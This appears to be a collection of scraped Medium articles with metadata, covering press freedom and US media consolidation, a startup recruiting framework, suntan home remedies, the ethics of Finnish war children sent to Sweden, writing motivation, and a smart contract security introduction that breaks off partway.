WHAT DOES THE WORLD PRESS FREEDOM INDEX (WPFI) MEASURE? The Index ranks 180 countries according to the level of freedom available to journalists. It is a snapshot of the media freedom situation based on an evaluation of pluralism, independence of the media, quality of legislative framework and safety of journalists in each country. HOW THE WPFI IS COMPILED The degree of freedom available to journalists in 180 countries is determined by pooling the responses of experts to a questionnaire devised by RSF. This qualitative analysis is combined with quantitative data on abuses and acts of violence against journalists during the period evaluated. The criteria used in the questionnaire are pluralism, media independence, media environment and self-censorship, legislative framework, transparency, and the quality of the infrastructure that supports the production of news and information.
RSF’s 2018 report on worldwide press freedom is one of its most pessimistic.
According to the WPFI, in 2018, press freedom in 74 percent of countries is either problematic, bad or very bad (see Figure 1). In 2002, the first year RSF calculated the WPFI, press freedom in only 45 percent of countries was categorized as problematic, bad, or very bad.
Figure 1: Distribution of World Press Freedom Index Scores (2018)
“Hostility towards the media from political leaders is no longer limited to authoritarian countries such as Turkey (ranked 157th out of 180 countries, down two ranks from 2017) and Egypt (161st), where “media-phobia” is now so pronounced that journalists are routinely accused of terrorism and all those who don’t offer loyalty are arbitrarily imprisoned,” reports RSF. “More and more democratically-elected leaders no longer see the media as part of democracy’s essential underpinning, but as an adversary to which they openly display their aversion.”
While citing President Donald Trump as one of the most visible culprits in verbally attacking journalists, RSF’s deepest concern is directed towards younger democracies.
“The line separating verbal violence from physical violence is dissolving. In the Philippines (ranked 133rd, down six from 2017), President Rodrigo Duterte not only constantly insults reporters but has also warned them that they “are not exempted from assassination,” says RSF. “In India (down two ranks to 138th), hate speech targeting journalists is shared and amplified on social networks, often by troll armies in Prime Minister Narendra Modi’s pay. In each of these countries, at least four journalists were gunned down in cold blood in the space of a year.”
Though physical attacks on U.S. journalists are still rare, the murder of five Maryland journalists last June being a sad exception, press freedom in the U.S. has nonetheless experienced an almost monotonic decline since 2002 (see Figures 2 and 3; high WPFI scores indicate lower levels of press freedom). Only a two-year interlude immediately before and after the 2008 presidential election saw the U.S. score significantly improve.
In 2002, the WPFI score for the U.S. was 4.75 (Rank 17th). Today, the U.S. score is 23.73 (Rank 45th). RSF’s singling out of President Trump as a causal factor in the U.S.’s press freedom decline is misplaced given that the U.S. WPFI score has been relatively flat over the past four years (see Figure 2).
Figure 2: World Press Freedom Index Score for the U.S. (2002–2018)
Figure 3: U.S. Rank on the WPFI (2002–2018)
And RSF is not the only monitoring organization that has found press freedom to be in decline worldwide.
“Only 14 percent of the world’s population live in societies in which there is honest coverage of civic affairs, journalists can work without fear of repression or attack, and state interference is minimal,” according to Freedom House’s Leon Willems and Arch Puddington. “Far too often today, the media present a regime account of developments in which the opposition case is ignored, distorted, or trivialized. And even in more pluralistic environments, news coverage is frequently polarized between competing factions, with no attempt at fairness or accuracy.”
The most troubling aspect of Freedom House’s finding is that even countries within the 14 percent (such as the U.S.) are witnessing an alarming rise in highly-polarized, non-objective journalism. And, in the case of the U.S., journalism is one of the least respected professions, according to the Gallup Poll.
Why has press freedom declined?
The decline in press freedom, worldwide and within the U.S., has many causal antecedents, according to RSF. In explaining the worldwide decline in press freedom in 2014–2015, RSF concluded, “Beset by wars, the growing threat from non-state operatives, violence during demonstrations and the economic crisis, media freedom is in retreat on all five continents.”
In the U.S. context, RSF’s hypotheses are plausible. Since 2002, the U.S. has engaged in two significant wars (Iraq, Afghanistan), both of which have produced mixed results (at best), has led or assisted military actions in Syria, Libya, and Yemen, has experienced a significant economic crisis (2008), and has seen the rise of two large domestic protest movements against an incumbent administration (Tea Party, #Resistance).
Declining media competition may be the biggest threat to journalism
RSF and other media researchers also cite media competition as a significant factor in explaining levels of press freedom. At one extreme is state-controlled media (China, North Korea) where there is no competition and press freedom is severely or completely curtailed. On the other end are pluralistic, democratic societies where media competition is not only present, but facilitated through government policy (Scandinavian countries, Germany New Zealand, Austria).
For the U.S., the media regulatory environment fundamentally changed in 1996 with the U.S. Telecommunications Act.
“There is no doubt the 1996 U. S. Telecommunications Act fueled increasing consolidation across the communication industries. Designed to eliminate barriers to competition, the 1996 Act greatly liberalized ownership limitations for broadcasting and cable companies, allowing companies to acquire more competitors,” according to media economics researchers Alan Albarran and Bozena Mierzejewska. “For example, in the radio industry alone, some 75 different companies operating independently in 1995 were consolidated into just three companies by 2000.”
In 1983, 90 percent of US media was controlled by 50 companies. Today, according to Fortune magazine, 90 percent of U.S. media is controlled by just six companies.
Figure 4: Media concentration in the U.S.
How can media consolidation be bad given that the average American has access to over 100 TV channels, not to mention the thousands of internet websites? Shouldn’t the profit-motive impel major corporations to increase the number of information and entertainment choices in order to capture as much of the audience as possible?
That is the argument The New York Time’s Jim Rutenberg made in 2002 as the media consolidation trend was hitting its stride: media mergers create more choice, not less, according to Rutenberg.
Unfortunately, the evidence is not clear at all on that contention. In fact, it appears the opposite is true. Instead of getting real choice, consumers are given the illusion of choice.
“As massive media conglomerates persevere in their quest to monopolize the industry, it is important to realize what this means for alternative viewpoints in media and the already overwhelming effort to hush voices these media giants consider outside the mainstream,” according to Rick Manning, President of Americans for Limited Government. “Differing ideas and perspectives are what make up the very fabric of this great nation, and if we’re not careful with putting too much power in the hands of too few, this could all disappear.”
And when Manning says “alternative viewpoints” he is not talking about the Traditionalist Worker Party getting its own cable TV network. He’s talking about news organizations such as Bloomberg getting squeezed out of the news and information marketplace. Manning is particularly critical of Comcast-NBCU (which owns MSNBC and CNBC).
“Since the Comcast-NBCU merger in 2011, they have proven time and time again that they are not beneath stifling competition or other viewpoints that may not line up with their own. In fact, not only are they not beneath it, there is ample evidence that points to Comcast repeatedly doing so,” contends Manning. “Take Bloomberg TV, for example. Comcast’s conditions stipulated that they place Bloomberg programming next to MSNBC and CNBC, or other competing news channels such as Fox or CNN, in the channel lineup — yet for three years Bloomberg was blocked from the news channel neighborhood and slotted in an unfavorable spot, which negatively affected their viewership.”
With respect to journalism, another potential information-biasing process occurs when large media companies control journalists’ access to audiences through the allocation of broadcast airtime or print space [Whatever happened to Dylan Ratigan and Ed Schultz on MSNBC?]. And instead of providing in-depth information and analysis, today’s news outlets, particularly the cable news networks, bludgeon Americans with lively but mostly content-sparse debate. Why? Because it is profitable. The rule for cable news is this: find your audience, reinforce what they already believe, and for God’s sake don’t make them uncomfortable. Disney, Fox, and Comcast would be delinquent in their duties to shareholders if they did otherwise.
Noam Chomsky, as he often does, offers the most damning critique of cable news: “The smart way to keep people passive and obedient is to strictly limit the spectrum of acceptable opinion, but allow very lively debate within that spectrum.”
Large media conglomerates have enormous power through a variety of effective tools to influence, modify, and censor information disseminated through the major media outlets. Only the U.S. Government wields greater power in that respect.
Here is a specific example of how The Disney Company recently attempted (and thankfully failed) to deny the Los Angeles Times access to advance screenings which are critical to the paper’s ability to do its job.
Access to credible sources is the lifeblood for any journalist. A journalist with sources is called an unemployed journalist.
So why would Disney deny the LA Times access to their advance screenings?
Case Study: Disney Bans LA Times
This is a note the Los Angeles Times offered to its readers last November:
The annual Holiday Movie Sneaks section published by the Los Angeles Times typically includes features on movies from all major studios, reflecting the diversity of films Hollywood offers during the holidays, one of the busiest box-office periods of the year. This year, Walt Disney Co. studios declined to offer The Times advance screenings, citing what it called unfair coverage of its business ties with Anaheim. The Times will continue to review and cover Disney movies and programs when they are available to the public.
So why was the LA Times excluded from advance screenings of Disney films during the 2017 Christmas season?
LA Times writer Glenn Whipp explained on Twitter that The Disney Company was unhappy with the LA Times’ investigation into Disney’s questionable business ties in Anaheim, California, home of the company’s Disneyland theme park.
Apparently, the LA Times’ critical reporting on how The Disney Company ‘strong-armed’ Anaheim’s local government was not well-received at Disney headquarters, prompting the company to blacklist the LA Times from interviews and advance screenings of Disney films in late 2017.
However, days after Disney banned the LA Times, other critics condemned the Disney action and compelled the company to lift its screening ban of the LA Times. Nonetheless, Disney made its point clear to entertainment journalists: Don’t cross the Mouse.
Since their late-2017 kerfuffle, Disney and the LA Times are cooperating again, but the recent approval of the Disney/Fox merger should raise an alarm for journalists. With every new Disney acquisition, its control over the information and entertainment landscape grows. With their acquisition of Fox’s entertainment properties, Disney will add the Avatar, The X-Men and Planet of the Apes franchises to its portfolio. And for every entertainment journalist working today, the Disney/Fox merger just makes the likelihood of their pissing off Disney (and losing access to critical industry sources) a little more likely.
Where media control is concentrated, press freedom suffers
What evidence exists showing the negative effects of media consolidation on press freedom? The amount of published research demonstrating this connection is small, but growing (some recent examples can be found: here, here, and here).
Along with RSF and Freedom House’s empirical work on press freedom, Columbia University Economics Professor Eli Noam has pioneered some expansive work on quantifying levels of media concentration across the globe.
In his 2016 book, Who Owns the World’s Media?, Noam and his collaborative team provide a data-driven analysis of global media ownership trends and their drivers. Using 2009 data (or later), they calculate overall national concentration trends, the market share of individual companies in the overall national media sector, and the size and trends of transnational companies in overall global media.
Employing a variety of concentration measures — in particular, the Herfindahl-Hirschman Index (HHI) and the Per Capita Number of Voices for firms with at least 1% market share (PCNV), both commonly used measures of market concentration — Noam computes media concentration scores for 30 countries where sufficient market share data are available.
The HHI (λ) is generally computed as follows:
where p is each firm’s market share, i is an individual firm, and n is the number of firms in that industry
Within each country, Noam computes an HHI score for each media sector and creates a total HHI score using a weighted average across media sectors.
The HHI is influenced by the relative size distribution of the media firms in each country and is not related to a country’s absolute market size. Whereas, the Per Capita Number of Voices (PCNV) is heavily influenced by a country’s population size. Hence, the U.S., China, India, Russia, and Brazil have very low PCNV scores (high media concentration). Also, for the graph below, RCF’s World Press Freedom Index was inverted (100 — WPFI) for ease of interpretation (i.e., high values of the inverted WPFI equals high levels of press freedom).
The Results
Figure 5 reveals a negative linear association between press freedom and media concentration (as measured by an additive index combining the HHI and PCNV scores computed by Noam).
While China is clearly an extreme outlier, pulling the relationship into a strong positive direction, its exclusion from the analysis does not change the significance of the relationship. The linear regression models shown in the Appendix — using these explanatory variables: HHI, PCNV, Media Concentration Index (HHI+PCNV) and an indicator variable for democracies — found all four variables to be significantly associated with press freedom. Overall, both linear models explained almost three-quarters of the variance in press freedom.
Figure 5: Relationship between Press Freedom & Media Concentration
Notice in Figure 5 the location of Egypt, India, Russia, Turkey, Mexico, and China. All five countries have experienced significant violence against journalists in the past decade, according to RCF, and are either ruled by autocratic regimes (China, Russia, Egypt) or are democracies under significant internal stress (Mexico, Turkey, India). Press freedom and autocracies are incompatible.
Even within the subset of democratic countries, there remains a significant positive relationship between press freedom and media concentration. In countries such as Switzerland, Ireland, Finland, Sweden, Belgium, and the Netherlands, where media pluralism is strong, their press freedoms are among the highest in the world. Though, Israel is an interesting outlier (low media concentration / relatively low press freedom).
Europe addresses media pluralism as the U.S. continues to approve mega-media mergers
Much of the recent research on media pluralism and market concentration relates to Europe, with the most comprehensive research conducted by the Centre for Media Pluralism and Media Freedom (CMPF) at the European University Institute. CMPF, a European Union co-funded research center, publishes the Media Pluralism Monitor (MPM) to assess the risks to media pluralism in a given country.
In its 2016 MPM report, the CMPF concluded: “Amongst the 20 indicators of media pluralism, concentration of media ownership, especially horizontal, represents one of the highest risks for media pluralism and one of the greatest barriers to diversity of information and viewpoints represented in media content.”
The European Union is actively monitoring media concentration, even using Russian election meddling in the U.S. and Europe as one of the justifications for addressing the issue. In March 2017, the EU’s High Level Expert Group (HLEG) for online disinformation concluded that one way to counter disinformation is through safeguarding the diversity of the European news media. In May 2017, the European Parliament adopted HLEG’s recommendation to create an annual mechanism to monitor media concentration in all EU Member States.
And what has the U.S. done for the past two decades with respect to media concentration?
Despite a significant number of major media mergers since the 1996 Telecommunications Act, most recently the Disney-Fox merger which still needs antitrust approval from Europe before it can be executed, the U.S. has not been silent on media pluralism and the dangers of media consolidation.
In 1945, the U.S. Supreme Court ruled in AP v. United States, “[the First] Amendment rests on the assumption that the widest possible dissemination of information from diverse and antagonistic sources is essential to the welfare of the public, that a free press is a condition of a free society.” In its 8–0 ruling (Justice Robert Jackson did not participate in the ruling), the Court upheld media ownership regulations to ensure source diversity, arguing “freedom to publish is guaranteed by the Constitution, but freedom to combine to keep others from publishing is not.”
Officially, the FCC’s policy objectives are competition, localism and diversity. Thus, before media mergers can occur they need approval from the FCC to ensure competition, localism and diversity are not threatened by a proposed merger.
In 2003, the FCC relaxed its ownership rules by eliminating cross-media ownership regulations in media markets with eight or more television stations, and allowed newspaper/television/radio cross-ownership in media markets served by four to eight television stations.
To assist the FCC in this new regulatory policy, the FCC developed a Diversity Index in 2002, which measured viewpoint diversity using a formula related to the Herfindahl-Hirschmann Index (HHI), a metric U.S. antitrust authorities have used to assess market competitiveness (i.e., concentration). The FCC Diversity Index (FDI) used consumers’ average time spent with each medium to weight its importance. It then assigned equal “market shares” to each outlet within each medium and combined those “market shares” for commonly owned outlets.
The FDI was controversial at its onset with many consumer advocacy groups arguing that it failed to capture the real degree of media concentration occurring in the U.S.
During testimony before the FCC in 2003, Dr. Mark Cooper, Director of Research for the Consumer Federation of America, offered this assessment of the FDI:
“The decision to allow newspaper-TV cross ownership in the overwhelming majority of local media markets in America is based on a new analytic tool, the Diversity Index, that was pulled from thin air at the last moment without affording any opportunity for public comment. The Diversity Index played the central role in establishing the markets where the FCC would allow TV-Newspaper mergers without any review. It produces results that are absurd on their face.” “The Commission arrives at its erroneous decision to raise the national cap on network ownership to 45 percent and to triple the number of markets in which multiple stations can be owned by a single entity because it incorrectly rejected source diversity as a goal of Communications Act. The Commission ignored the mountain of evidence in the record that the ownership and control of programming in the television market is concentrated and extensive evidence of a lack of source diversity across broadcast and non-broadcast, as well as national and local markets. Allowing dominant firms in the local and national markets to acquire direct control of more outlets will enable them to strengthen their grip on the programming market, which undermines diversity and localism.”
Twenty-two years ago, President Bill Clinton signed the Telecommunications Act of 1996, a sweeping piece of legislation that was “essentially bought and paid for by corporate media lobbies…and radically opened the floodgates on mergers,” according to the media watchdog, Fairness and Accuracy in Reporting (FAIR).
Understandably, PACs and lobbyists for the big media companies put their money behind Hillary Clinton in 2016 (about $50 million, not including internet-related PACs or individual contributions…and that does not include donations to the Clinton Foundation from media-related sources). But, as we’ve seen so far in the Trump administration, the media mergers have continued unabated and, if anything, Trump’s presence in the White House has lifted profits for all of the major media companies.
Why does this all matter?
The news media plays a critical role in informing the public about our democracy and, as we saw in the 2016 election, the mere possibility that malevolent forces might have manipulated information in that election is unsettling. Add in social media and other new media platforms and the potential for real mischief is substantial.
But it isn’t just foreign actors like Russia that we need to guard against. We need to look closely at the domestic forces that can censor and manipulate what information Americans receive.
“How can we have a real debate about media issues, when we depend on that very media to provide a platform for this debate?” asks Boston journalist Michael Corcoran. “It is no surprise, for instance, that the media largely ignored the impact of Citizens United after the Supreme Court decision helped media companies generate record profits due to a new mass of political ads.”
“Democracy suffers when almost all media in the nation is owned by massive conglomerates. In this reality, no issue the left cares about — the environment, criminal legal reform or health care — will get a fair shake in the national debate,” laments Corcoran.
Of course, it is not just the progressive left that suffers under the American media oligarchy — any viewpoint or perspective substantially deviant from the interests of the media oligarchs suffers. The agenda-driven journalism that defines most of what we watch and read today, effectively discharged from the strict requirements of objectivity and backed by the enormous resources of the major media companies, is becoming ever harder to counteract.
Conversely, the major media companies — along with the social media giants — are increasingly equipped to suffocate news and information that threatens their corporate interests.
If Comcast, News Corp., Viacom, Disney, CBS, and Time Warner collectively or informally decide a U.S.-backed invasion of Iran will help keep their corporate revenues growing, what independent news outlet or journalist is going to have the coverage and market share to challenge them?
Democracy Now, The Intercept, and The Empire Files are not enough to defend against the palpable threat the major media companies pose to American journalism and, by necessary extension, the American democracy.
K.R.K.
APPENDIX: LINEAR REGRESSION MODELS
Three-Variable Model
Dependent Variable: Press Freedom as measured by WPFI
Independent Variables: HHI, PCNV, Democracy Indicator
Two-Variable Model
Dependent Variable: Press Freedom as measured by WPFI
Independent Variables: Concentration Index (HHI+PCNV), Democracy Indicator
|
https://kentkroeger.medium.com/update-press-freedom-is-declining-worldwide-63e3f8d247fe
|
['Kent Kroeger']
|
2018-10-09 20:42:13.206000+00:00
|
['News', 'Politics', 'Media', 'Free Speech', 'Journalism']
|
⏅ The 4 Pillars of Recruiting
|
Recruiting is like a box of chocolate. You better know what you’re going to get!
Hi everyone!
Welcome to the TRY ANGLES weekly review where my job is to share with you new readings, methods and tools that I have found and tested.
Today we will start a journey on recruiting. How many writers, how many business leaders are telling us that recruiting is THE most important thing to help your business performance.
Don’t miss out on the next episodes and signup for the newsletter following that link
Two years ago I had not hired anybody in my life, yet I needed to build my teams. That’s how I jumped into the pool of recruitment. I was not ready for this.
Recruiting is extremely time consuming and contains a lot of complexity because of the interpretation skills involved in the process.
Designing an effortless recruiting process has been a fun thing to do and enabled me to save time and select great candidates over 200 people averaging 2 interviews each.
At the end of this article you’ll have a grasp of the building blocks necessary to have an effective recruiting pipe.
Here is what you’ll find in today’s article:
How to use recruiting agencies
Build an effortless recruiting process
Get your team involved
Take It Easy With Recruiting Agencies
Recruiting agencies appear like the savior when you have no idea how to recruit. Honestly they have had a bitter sweet taste for me, and in hindsight I do not believe that you should use them when you have an early stage company.
They will help you to find candidates, but the price to pay is high and it will still be your responsibility to select the right person. There’s no shortcut for this.
Even though most of them are rewarded on success fees, if somehow things do not match with the candidate, you find yourself locked up with the recruiters holding your cash.
Now, candidate is gone, cash is gone and you can only hope the recruiter will introduce you with better ones. If you fill in the position by any other means your cash is lost. It is not an ideal position to be in.
It’s no secret that in the first years of your young company you’ll have to iterate a lot, and recruiting is part of the iteration. Try to keep recruiting in house as long as you can. It might save you a couple of thousands euros.
Nevertheless a possible alternative if you want to save some time is to use recruiters specialized in the sourcing of candidates while keeping the selection process under your control.
Now the fun begins! There is no shortcut: you need a good recruiting process.
The Building Blocks Of Recruiting
How do you start if you don’t have any idea how recruiting is done? As usual, you’ll find help in books and articles. The main source of information for the recruiting process I have designed has been the book “Who”.
This book has helped me understand the key building blocks of an effective recruiting process and I wanted to share them with you. The method is separated into 4 sections:
1. Scorecard — Job description on steroids
The scorecard is a more elaborated job description composed of four main pillars:
The mission : why the job exists
: why the job exists The outcomes : how performance will be assessed
: how performance will be assessed The competencies : how to match the role, the culture and the candidates’ skillset
: how to match the role, the culture and the candidates’ skillset The alignment: ensure that the job matches expectations with other roles within the company
2. Source — Spread the word
You will use mainly three ways to source candidates:
Referrals , thanks to current employees, and first or second circle network
, thanks to current employees, and first or second circle network Recruiters , responsible for a large scope from sourcing to selecting the candidates
, responsible for a large scope from sourcing to selecting the candidates Researchers, responsible for the sourcing part of the recruiting process
Recruiters and researchers can have a variable scope based on what you want to keep internalized or outsourced. More on that in future articles.
3. Select — There can only be one
You have a scorecard, you have candidates. Now the show must go on. A good recruiting process is composed of four types of interviews:
Screening interviewCheck the fit of values and interest from the candidate
interviewCheck the from the candidate Who interview Dig deep into the candidate’s achievements and previous experiences
interview and previous experiences Focused interview Develop a specific part of the candidate experience , where you need more insight. It is a good opportunity to include your team members in the process.
interview , where you need more insight. It is a good opportunity to include your team members in the process. Reference interviewHave a chat with the candidate’s references, and cross check facts and information looking for redflags.
You might also want to add an extra step, which is why I added the:
Skills and Test interview. The goal of this interview is to test the motivation of the candidate, the skills and the mindset.
You can substitute it to the focused interview, if the process becomes too long, or add it in between the Screening and Who interview
No need to mention that you might adapt the process based on the seniority of the candidate. You won’t have the same criteria and process if you hire an intern, a sales person or a CTO.
4. Sell — Bring it home
It doesn’t stop there, because even though you have selected someone, you need more than ever to continue selling your company and the project you want the candidate to be onboarded on.
Now would be a terrible time to lose the chosen candidate after all the efforts you’ve made to reach the end of the process.
Do not let the chance slip and keep a close relationship with the chosen candidates until they are onboarded in your company. Stay in touch with them and make sure to prepare for their arrival before hand.
Involve Your Teammates In The Process
Even though you might be responsible for most of the recruiting process (especially for smaller companies), it is important to have your teammates involved in the process design and (ideally) in the interviews.
It has two benefits:
Help to identify red flags and cut candidates based on complementary point of views
Build diverse criteria of selection, based on every participants in the process. Eventually it will help to have a better fit with the company’s culture.
If you had no idea how to build a recruiting pipe, now you are all set to go with this framework.
There are many ways we can go from there and we will have a look at them in the next episodes.
If you don’t want to miss them signup here: following that link !
Upcoming episodes
The next episodes will be digging deeper into each step of the way to help you implement the method.
The Scorecard
The Screening Interview
Signup here to get it delivered in your mailbox 📬
Try Angles’ newsletter will be delivered to you every two weeks on business and self-development topics.
Resources
Who — A method for hiring — Geoff Smart and Randy Street
That’s it for this weekly review I hope you’ve enjoyed it.
Thanks for reading and until next time!
Cheers,
Franck ⏅
|
https://medium.com/@franck-nussbaumer/the-4-pillars-of-recruiting-c77b1cb2a82c
|
['Franck Nussbaumer']
|
2020-11-11 09:00:51.748000+00:00
|
['Recruiting', 'Startup', 'Recruitment', 'Process', 'Hiring']
|
Home Remedies To Remove Suntan Naturally:-
|
1. Sandalwood Powder:-
Take 2 tbsp of sandalwood powder +2 tbsp of rose water. Mix both of the ingredients to make a thin paste. Then apply the pack all over the face and neck area. Leave it for 15 minutes and wash it with cold water. You can use this pack twice a week to see the best result.
Sandalwood powder can fight acne-causing bacteria, exfoliate the skin and helps to remove suntan. Rosewater helps to lighten skin pigmentation and it helps to maintain skin PH balance and also controls excess oil.
2. Lemon Juice and Honey:-
Take 2 tbsp of lemon uice+1 tbsp of honey. Mix the ingredients thoroughly. Apply the pack on to your face, leave it for 30 minutes and wash off.
Lemon Juice has a bleaching property that effective in removing suntan. Honey keeps the skin soft.
3. Gram flour and Tumeric Powder:-
Take 1 tbsp of gram flour(besan)+1 tbsp of Tumeric powder. Mix both the ingredients using water to make a thin paste. Apply this on to your face and neck area. Leave it for 15 minutes, then wash it off with cold water.
Tumeric powder helps to brighten your skin and gram flour helps to exfoliate the dead skin and removes tan.
4. Multani Mitti and Rose Water:-
Take 1 tbsp of Multani mitti+ 1 tbsp of rose water. Mix the ingredients and apply it on to your face and leave it for 10 minutes.
Multani mitti cools and soothes sunburns. It also removes tan and makes your skin radiant.
|
https://medium.com/@rani-lipsasahu/home-remedies-to-remove-suntan-naturally-3c0e1a9e86d6
|
['Rani Lipsasahu']
|
2020-02-20 17:35:29.798000+00:00
|
['Home Remedies', 'Beauty Tips', 'Skincare']
|
War Brings Ethical Dilemmas into Sharp Relief.
|
It is a little more easy to consider ethical dilemmas concerning children, if one always takes the position that the best interests and health of the child is primary. One will then be well served in whatever decision one makes. We could go down the list of participants in this sad story, and ask ourselves, “did this individual/system/administration have the best interests of these children at heart when they made their decisions?” If The Finnish parents and government had not sent the children to Sweden (and other places), what’s the likelihood that many of them wouldn’t have survived the war, or lost their parents, or faced grave hardships? Would any of them have reached the age where they might have been pressed into military service, and would have possibly killed or have been killed?
Yes, these children were sadly separated from their families and their country, but they were moved to a safer environment that avoided war due to neutrality, and were placed with families that had resources to take care of them, and wanted to take care of them. Having lived there for years, perhaps barely remembering their original language, or even their original families, is it ethical to force them to return to their birth country? What if the child is 12 years of age, and states clearly that they consider the Swedish adults their parents, and that they want to stay and not return to Finland? If the child has reached “the age of reason,” what rights does s/he have to make those decisions for themselves? Shouldn’t their birthparents have understood that there would be a risk that they would never see their children again if they sent them away? Were they forced to send their children away, like the native people of Canada had to do, because of a racist government policy of forced child separation and encampment of Indian children in residential schools, or did the Finns choose to send them, even if for only caring motivations? Is it ethical to demand that children return, often to a much less healthy and nurturing environment, when a child clearly states that they do not want to return, and would be retraumatized should they have to return?
|
https://medium.com/@patrickinca1/war-brings-ethical-dilemmas-into-sharp-relief-aea8fa9caebe
|
['Patrick O Hearn']
|
2020-11-07 21:52:09.788000+00:00
|
['Ethics', 'Finland', 'Displacement', 'World War II', 'Trauma']
|
What if you have no motivation to write?
|
Photo by Nick Fewings on Unsplash
I’ve seen people bring this up as a struggle a few times: “I’m just not motivated to write.” And I’ve been there too. You found this thing you love doing, so why aren’t you doing it all the time?
I’ve got two thoughts on this:
I have no motivation to work out. I mean, I hate working out. But I’m also 40+ and my metabolism isn’t doing the heavy lifting it used to do, so I need to work out. So here’s what I did: I started small and I created a daily habit. Alexa has a “7-minute workout” program that I started doing just 3 days a week. Now, I know that sounds like it would make zero difference, and maybe I’m not gonna lose any weight from that, but what I am doing is establishing a habit. You start small and build up. And here’s what I’ve found: the more I do it, the more I enjoy it, the more motivated I am to do it. I even have an app that tracks my habits so I can go back and see my progress and that also gives me more motivation. So set yourself a small goal, keep track of it, and see if that doesn’t increase your motivation over time. If you start dating someone and you find yourself with no motivation to hang out with them, it’s probably time to start dating someone else. For a writer, that might mean that the story you are working on is not the story you need to be writing right now. You should be so thrilled to sit down and knock out that story every time you sit down to write. It should be a love affair. If you’re not “feeling it” it’s okay to break up with that story and move on to one you are passionate about.
I will say that these two things (habits and passion) get easier the more you do it. These writing habits start to become less of a chore as you go and just like dating, you start to recognize what you like or don’t like in a story the more you “write around.”
So it’s gonna be hard at first. It’s gonna be a lot of false starts and a lot of giving up and coming back. But that’s okay. It’s all part of the process as you discover yourself as a writer.
What about you guys? Got any tips for increasing your motivation to write?
|
https://medium.com/scriptblast/what-if-you-have-no-motivation-to-write-b0b1006f8955
|
['Hudson Phillips']
|
2020-11-16 11:02:13.080000+00:00
|
['Writing', 'Screenwriting', 'Filmmaking', 'Scriptblast', 'Screenplay']
|
Program Synthesis — Smart Contract Security 101
|
After reading this post you’ll know about — smart contract security, an application of Program Synthesis developed by Synthetic Minds and prospects of this industry. My previous post describes in details what Program Synthesis is and why you should care.
To recap the first post — Program Synthesis allows developers to create programs that in turn create other programs. The promise is very appealing but there are challenges that limit the applicability of Program Synthesis. One way is to find problems where Programs Synthesis adds significant business value. One such problem is smart contract security.
Smart Contracts
You have probably heard about blockchain technology — distributed systems technology that allows participating entities to transact with each other without a central authority. Without going into details, the main breakthrough of this technology is that participants do not have to trust each other in order to transact. The validity of actions is supported by math, encryption, and economic incentives. One of the most promising features within many blockchains is “smart contracts”. Smart contracts are perpetually running programs, i.e., apps, providing services independent of any controlling entity.
Smart contracts are de-facto computing scripts, written in Ethereum Virtual Machine (EVM) code or higher languages built on top of EVM, and typically implement specific functionality. For instance, a distributed computing platform on blockchain, such as Golem or Sonm, is a smart contract that governs the distribution of computation power for those who need it and rewards the sharers. Many things, from a small reminder app to a platform such as AWS, can theoretically be built as a smart contract.
A generic representation of how should a smart contract work in an ideal case by Atul Mehta
In the most simplified case (permissionless blockchain, all-digital assets, etc) smart contracts have clear advantages. Because, IF properly developed, they are:
Self-executable –smart contracts can be triggered by events, e.g., “IF event X happens, THEN do Y”. For instance for a decentralized stock exchange, “If I send money to a certain account, then change the owner of a certain stock to my name”. This might have some challenges if an external data provider is involved, but ideally, all data would be trustless and can sit on the blockchain. In this case, self-execution ensures that contracts execute independently of any third-parties, i.e., the stock exchange in the case above.
–smart contracts can be triggered by events, e.g., “IF event X happens, THEN do Y”. For instance for a decentralized stock exchange, “If I send money to a certain account, then change the owner of a certain stock to my name”. This might have some challenges if an external data provider is involved, but ideally, all data would be trustless and can sit on the blockchain. In this case, self-execution ensures that contracts execute independently of any third-parties, i.e., the stock exchange in the case above. Unequivocal –since the set of IF and THEN statement is clearly defined and encoded in the software, there should be no ambiguity about what happens when.
–since the set of IF and THEN statement is clearly defined and encoded in the software, there should be no ambiguity about what happens when. Immutable–once the contract is deployed on the network, it cannot be changed. An exceptional cases is the underlying blockchain hard-forks in which the majority of network participants agree to implement a change.
The main challenge is that big and bold “IF properly developed”. One part of this challenge is that it is a “contract”. There should be clear business logic. Sometimes it is not trivial to design a contract that accounts for all possibilities. But the other part of the challenge is that it is “smart”, meaning that it is a program and therefore it brings a whole layer of digital security requirements.
The bugs in smart contracts of popular systems such as DAO and Parity (1st and 2nd attacks) alone led to more than $350m being stolen or frozen. Also, with smart contracts, because their executions are immutable, money can just become stuck and inaccessible, as has happened in the past.
Smart contract security
Software developers have been testing their software in different forms for years. So a natural question is–if smart contracts are pieces of software, why do we need a specific solution for smart contract security? Wouldn’t regular software testing suffice? There are a few things that differentiate software development from smart contract development.
Smart Contract code is permanent. The modern software development practices such as CI/CD allow developers to release updates almost on a daily basis. Smart contract execution is immutable, and a developer cannot just release a patch to fix bugs. Theoretically, it is possible to have the entire network come to consensus about reverting, but it is a huge pain. For instance, the DAO held 14% of all ether when it crashed, motivating the Ethereum community to hard-fork. In the non-blockchain world, the analogy is to think about asking Amazon to change AWS’ underlying infrastructure to fix bugs in a customer’s cloud machines. Thus, the software development philosophy of continuous improvements is not entirely applicable to smart contract development. Smart Contracts’ code is public. In traditional software, customers only see the user-facing elements of applications and therefore have a limited-to-no understanding of the internal structure of the software. The deployed code for smart contracts is publicly visible, allowing decentralized execution. But this also adds more capabilities to hackers, as they have more information to find and exploit vulnerabilities. For many smart contracts, in addition to the deployed code, the source code is also public. Of course, open source is not a blockchain-specific phenomenon as many traditional products from Linux to Drupal are open-sourced. In contrast to those mature systems, standards and best practices are still being developed in this nascent domain, alongside the additional moving target of development happening at the infrastructure layer. A high value of dollars at risk per one line of code ($/LOC). The DAO was about 1200 lines of code and this is an average-size smart contract. The DAO breach was pegged at $180m lost, which represents $150k per line of code. Compared to non-blockchain software (e.g., Intuit Quickbooks is 10 million lines of code) the value of assets per line of code differs by orders of magnitude and therefore smart contracts require much more stringent security checks.
Companies addressing smart contract security
Within 3 last weeks, I have spoken to 16 companies from a broad range of industries from a security token platform in the US to a marketplace for classified goods in Singapore. There was unanimous agreement about the need and desire for smart contract-security, but the reason and methods differed from company to company.
There are two main ways how companies go about smart contract security — use smart contract security internally or hire audit firms. Most companies that I spoke to used some combination of both.
